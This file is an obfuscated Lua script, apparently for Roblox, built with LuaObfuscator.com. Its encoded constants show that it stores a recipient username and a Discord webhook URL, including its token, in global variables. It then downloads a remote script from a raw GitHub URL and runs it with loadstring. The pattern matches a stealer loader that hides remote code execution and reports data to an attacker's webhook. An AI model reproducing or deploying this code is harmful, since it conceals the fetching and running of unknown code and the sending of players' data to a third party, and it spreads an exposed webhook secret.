--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=0;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==0) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=1 -0 ;end end end v23=nil;function v23() local v33,v34=v1(v16,v19,v19 + (4 -2) );v19=v19 + (621 -(555 + 64)) ;return (v34 * (1187 -(857 + 74))) + v33 ;end v18=3;end if (v18==4) then function v25() local v35=v24();local v36=v24();local v37=569 -(367 + 201) ;local v38=(v21(v36,1 -0 ,(657 -287) -(87 + 261 + 2) ) * ((929 -((1005 -(368 + 423)) + (2240 -1527)))^(9 + 23))) + v35 ;local v39=v21(v36,4 + 17 ,75 -44 );local v40=((v21(v36,32)==(878 -(282 + 595))) and  -(3 -2)) or (1638 -(1523 + 114)) ;if (v39==((18 -(10 + 8)) + 0)) then if (v38==(0 -0)) then return v40 * (0 -0) ;else local v80=(0 -0) + 0 ;while true do if ((1065 -(68 + 997))==v80) then v39=1271 -(226 + 1044) ;v37=0 -0 ;break;end end end elseif (v39==(2164 -(32 + 85))) then return ((v38==(0 + 0)) and (v40 * ((1188 -(1069 + 118))/(0 + 0)))) or (v40 * NaN) ;end return v8(v40,v39-((2679 -(416 + 26)) -1214) ) * (v37 + (v38/((959 -(892 + (207 -142)))^(123 -71)))) ;end v26=nil;function v26(v41) local v42;if  not v41 then v41=v24();if (v41==(0 + 0)) then return "";end end v42=v3(v16,v19,(v19 + v41) -(1 -0) );v19=v19 + v41 ;local v43={};for v67=439 -(145 + 293) , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29() local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44~=(2 + 0)) then else local v74=0;local v75;while true do if ((1474 -(1329 + 145))~=v74) then else v75=0;while true do if ((971 -(140 + 831))~=v75) then else for v107=1851 -(1409 + 441) ,v49 do local v108=718 -(15 + 703) ;local v109;local v110;local v111;local v112;while true do if (v108~=(1 + 0)) then else v111=nil;v112=nil;v108=440 -(262 + 176) ;end if (v108~=(1721 -(345 + 1376))) then else v109=688 -(198 + 490) ;v110=nil;v108=1;end if (v108==2) then while true do if (v109==(0 -0)) then local v125=0 -0 ;while true do if (v125~=0) then else v110=1206 -(696 + 510) ;v111=nil;v125=1;end if (v125==1) then v109=1;break;end end end if (v109==(1 -0)) then v112=nil;while true do if (v110==1) then if (v111==1) then v112=v22()~=(1262 -(1091 + 171)) ;elseif (v111==(1 + 1)) then v112=v25();elseif (v111==(9 -6)) then v112=v26();end v50[v107]=v112;break;end if (0~=v110) then else local v159=0 -0 ;local v160;while true do if ((374 -(123 + 251))~=v159) then else v160=0 -0 ;while true do if (v160==1) then v110=699 -(208 + 490) ;break;end if (0==v160) then v111=v22();v112=nil;v160=1 + 0 ;end end break;end end end end break;end end break;end end end v48[3]=v22();v75=1;end if (1~=v75) then else for v113=1 + 0 ,v24() do local v114=0;local v115;local v116;local v117;while true do if ((836 -(660 + 176))~=v114) then else v115=0 + 0 ;v116=nil;v114=1;end if (v114~=1) then else v117=nil;while true do if (v115~=0) then else local v126=0;while true do if (v126==1) then v115=203 -(14 + 188) ;break;end if ((675 -(534 + 141))~=v126) then else v116=0 + 0 ;v117=nil;v126=1;end end end if (v115==(1 + 0)) then while true do if (v116==(0 + 0)) then v117=v22();if (v21(v117,1 -0 ,1 -0 )==0) then local v177=0 -0 ;local v178;local v179;local v180;while true do if (v177==(2 + 1)) then if (v21(v179,2 + 1 ,399 -(115 + 281) )==1) then v180[9 -5 ]=v50[v180[4 + 0 ]];end v45[v113]=v180;break;end if (v177==(0 -0)) then local v182=0 -0 ;while true do if (1==v182) then v177=1;break;end if (v182==(867 -(550 + 317))) then v178=v21(v117,2,3);v179=v21(v117,5 -1 ,8 -2 );v182=2 -1 ;end end end if (v177==(287 -(134 + 151))) then local v183=0;while true do if (v183==0) then if (v21(v179,1,1666 -(970 + 695) )==(1 -0)) then v180[1992 -(582 + 1408) ]=v50[v180[6 -4 ]];end if (v21(v179,2 -0 ,7 -5 )~=(1825 -(1195 + 629))) then else v180[3]=v50[v180[3]];end v183=1 -0 ;end if (v183==(242 -(187 + 54))) then v177=3;break;end end end if (v177==1) then local v184=780 -(162 + 618) ;while true do if (v184~=0) then else v180={v23(),v23(),nil,nil};if (v178==0) then local v191=0;local v192;local v193;while true do if (v191==(0 -0)) then local v195=0;while true do if (v195==0) then v192=0;v193=nil;v195=1;end if (v195~=1) then else v191=1;break;end end end if (v191==1) then while true do if (v192==0) then v193=0 -0 ;while true do if (v193==(0 + 0)) then v180[3]=v23();v180[4]=v23();break;end end break;end end break;end end elseif (v178==(1637 -(1373 + 263))) then v180[1003 -(451 + 549) ]=v24();elseif (v178==2) then v180[3]=v24() -(2^(6 + 10)) ;elseif (v178==3) then local v197=0 -0 ;local v198;while true do if (0~=v197) then else v198=0;while true do if (v198==(0 -0)) then v180[1387 -(746 + 638) ]=v24() -((1 + 1)^(23 -7)) ;v180[4]=v23();break;end end break;end end end v184=1;end if (1==v184) then v177=343 -(218 + 123) ;break;end end end end end break;end end break;end end break;end end end v44=3;break;end end break;end end end if (v44==3) then for v81=1582 -(1535 + 46) ,v24() do v46[v81-1 ]=v29();end return v48;end if (v44==1) then local v76=0 + 0 ;while true do if (0==v76) then v48={v45,v46,nil,v47};v49=v24();v76=1;end if (v76==(1 -0)) then v50={};v44=2;break;end end end if (v44==(1467 -(899 + 568))) then v45={};v46={};v47={};v44=1;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51) if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v51,16));if v20 then local v99=v5(v70,v20);v20=nil;return v99;else return v70;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v52=0 + 0 ;local v53;local v54;local v55;local v56;while true do if (v52==(0 -0)) then v53,v54,v55,v56=v1(v16,v19,v19 + (606 -(268 + 335)) );v19=v19 + ((17 + 277) -(60 + 230)) ;v52=(1597 -(706 + 318)) -(426 + 146) ;end if (v52==((1252 -(721 + 530)) + 0)) then return (v56 * (16778672 -(282 + 1174))) + (v55 * (66347 -(569 + 242))) + (v54 * (737 -481)) + v53 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59) local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...) local v83=v61;local v84=v62;local v85=v63;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (v98==1) then if (v96<=5) then if (v96<=2) then if (v96<=0) then v93[v95[2]][v95[3]]=v95[4];elseif (v96==1) then do return;end elseif (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96<=3) then v93[v95[2]]=v95[3];elseif (v96>4) then local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==0) then v128=v95[2];v129,v130=v86(v93[v128](v13(v93,v128 + 1 ,v95[3])));v127=1;end if (v127==1) then v88=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==2) then for v174=v128,v88 do v131=v131 + 1 ;v93[v174]=v129[v131];end break;end end else local v132;local v133,v134;local v135;local v136;v93[v95[2]]=v59[v95[3]];v87=v87 + 1 ;v95=v83[v87];v136=v95[2];v135=v93[v95[3]];v93[v136 + 1 ]=v135;v93[v136]=v135[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v136=v95[2];v133,v134=v86(v93[v136](v13(v93,v136 + 1 ,v95[3])));v88=(v134 + v136) -1 ;v132=0;for v154=v136,v88 do v132=v132 + 1 ;v93[v154]=v133[v132];end v87=v87 + 1 ;v95=v83[v87];v136=v95[2];v93[v136]=v93[v136](v13(v93,v136 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];end elseif (v96<=8) then if (v96<=6) then v93[v95[2]]=v59[v95[3]];elseif (v96>7) then v93[v95[2]]();else local v146=v95[2];v93[v146]=v93[v146](v13(v93,v146 + 1 ,v88));end elseif (v96<=9) then v87=v95[3];elseif (v96==10) then local v148=0;while true do if (v148==1) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v148=2;end if (v148==3) then v87=v95[3];break;end if (v148==0) then v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v59[v95[3]];v148=1;end if (v148==2) then v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v148=3;end end else local v149=v95[2];local v150=v93[v95[3]];v93[v149 + 1 ]=v150;v93[v149]=v150[v95[4]];end v87=v87 + 1 ;break;end if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66) if v66 then local v71=0;local v72;while true do if (v71==(1271 -(98 + 847 + 326))) then v72=(v64/((4 -2)^(v65-(1 + 0))))%(((206 + 496) -(271 + 429))^(((v66-1) -(v65-(1 + 0 + 0))) + (1501 -(1408 + 92)))) ;return v72-(v72%(1087 -(461 + (1154 -(406 + 123))))) ;end end else local v73=(1290 -((2762 -(1749 + 20)) + 295))^(v65-(1 + 0 + 0)) ;return (((v64%(v73 + v73))>=v73) and (1172 -(418 + 753))) or (0 + (1322 -(1249 + 73))) ;end end v22=nil;v18=2;end end end return v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103023O005F4703083O00557365726E616D65030A3O0072616E69656C5F6A7564030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323339312O363133313631373533343037322F71456A57432O7437747A396335513836625A4D6F2D756F4F6D4A56446C56684774536C56507153654E37363231766C65384943796662484D7430725474465A704E56325900143O0012033O00013O0026023O000B000100020004093O000B0001001206000100033O001204000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026023O0001000100010004093O00010001001206000100073O00300A00010008000900122O000100073O00302O0001000A000B00124O00023O00044O000100012O00013O00017O00",v9(),...);
